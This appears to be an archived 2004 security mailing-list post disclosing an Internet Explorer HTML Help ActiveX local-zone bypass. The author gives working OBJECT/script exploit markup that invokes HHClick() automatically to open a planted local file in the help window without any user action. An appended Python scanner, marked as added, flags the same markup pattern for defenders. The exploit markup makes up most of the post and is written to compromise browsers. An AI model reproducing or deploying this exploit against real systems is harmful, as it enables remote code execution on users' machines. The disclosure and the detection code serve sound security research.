


Related information

  Microsoft Internet Explorer DHTML Edit and Help ActiveX cross-site scripting

  Microsoft Security Bulletin MS05-013 Vulnerability in the DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (891781)

  IE HHCTRL exploit still usable even after patch

  US-CERT Technical Cyber Security Alert TA05-012B -- Microsoft Windows HTML Help ActiveX Control Cross-Domain Vulnerability

  Alert: Microsoft Security Bulletin MS05-001 - Vulnerability in HTML Help Could Allow Code Execution (890175)

From: Paul <paul_(at)_greyhats.cjb.net>
Date: 21.12.2004
Subject: Internet Explorer Help ActiveX Control Local Zone Security Restriction Bypass Vulnerability (updated)



I apologize for the previous vulnerability (longnamevuln) because it was incomplete. After realizing my
mistake, longnamevuln looked useless. However, it was just incomplete, not useless. What longnamevuln did
was open a local file in the browser window. To execute active content, it needed to be opened in the help
window. To do this, a window name parameter set to a blank window needed to be added. The updated code is
designed for Malware's original local zone security restriction bypass which required the user click a
button (http://malware.com/noceegar.html). The drag and drop vulnerability does not appear to be functional;
however, the local zone security bypass vulnerability still appears to work fine. Instead of this (malware's
code):

<OBJECT id="hhctrl" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7%
height=7% style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Index">
<PARAM name="Item1" value="cigar.hhk">
</OBJECT>

one would use this (my code):

<OBJECT id="hhctrl" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7%
height=7% style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm">
</OBJECT>
<script>
hhctrl.HHClick();
</script>

Notice that HHClick is automated, eliminating the need for user interaction (finally). My site,
http://greyhats.cjb.net, will not be updated with the new code because it is a small change, and I don't
want to go through the hassle of trying to deal with the ftp server on my unreliable host (hope websamba
isn't reading this :).

That's all folks!
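
The following is an added example, not part of the original post or the author's code: a content-screening check a defender could run over saved HTML to flag the markup pattern the post describes (the HTML Help control with a "Related Topics" command, a Window parameter, an item pointing at a local drive path, and a scripted HHClick call). The class, function and indicator names are hypothetical, and the sample page is constructed with a placeholder path.

```python
import re
from html.parser import HTMLParser

# CLSID of the HTML Help control, taken from the OBJECT tags in the post.
HHCTRL_CLSID = "clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
LOCAL_ITEM = re.compile(r"^[^;]*;\s*[a-z]:\\", re.I)  # "<label>;<drive>:\..."

class HHCtrlScanner(HTMLParser):
    """Collects the PARAMs of each OBJECT that instantiates the HTML Help control."""
    def __init__(self):
        super().__init__()
        self.objects, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            # Drop whitespace so a CLSID wrapped across lines still matches.
            clsid = "".join(a.get("classid", "").lower().split())
            self._cur = {} if clsid == HHCTRL_CLSID else None
            if self._cur is not None:
                self.objects.append(self._cur)
        elif tag == "param" and self._cur is not None:
            self._cur[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._cur = None

def scan(html):
    """Return the sorted list of indicator names found in one page."""
    s = HHCtrlScanner()
    s.feed(html)
    s.close()
    hits = set()
    for p in s.objects:
        hits.add("hhctrl-object")
        if p.get("command", "").lower().startswith("related topics"):
            hits.add("related-topics-command")
        if "window" in p:
            hits.add("window-param")
        if any(k.startswith("item") and LOCAL_ITEM.match(v) for k, v in p.items()):
            hits.add("local-file-item")
    if s.objects and "hhclick" in html.lower():
        hits.add("scripted-hhclick")
    return sorted(hits)

# Constructed sample; the Item1 path is a placeholder, not a real file.
SAMPLE = '''<object id="h" classid="clsid:adb880a6-d8ff-11cf-9377-
00aa003b7a11"><param name="Command" value="Related Topics, MENU">
<param name="Window" value="$global_blank">
<param name="Item1" value="command;C:\\EXAMPLE\\placeholder.htm">
</object><script>h.HHClick();</script>'''

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A page that only embeds the control with an Index command and a relative .hhk item yields just the hhctrl-object indicator, so the combination of indicators is what distinguishes the pattern in the post.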
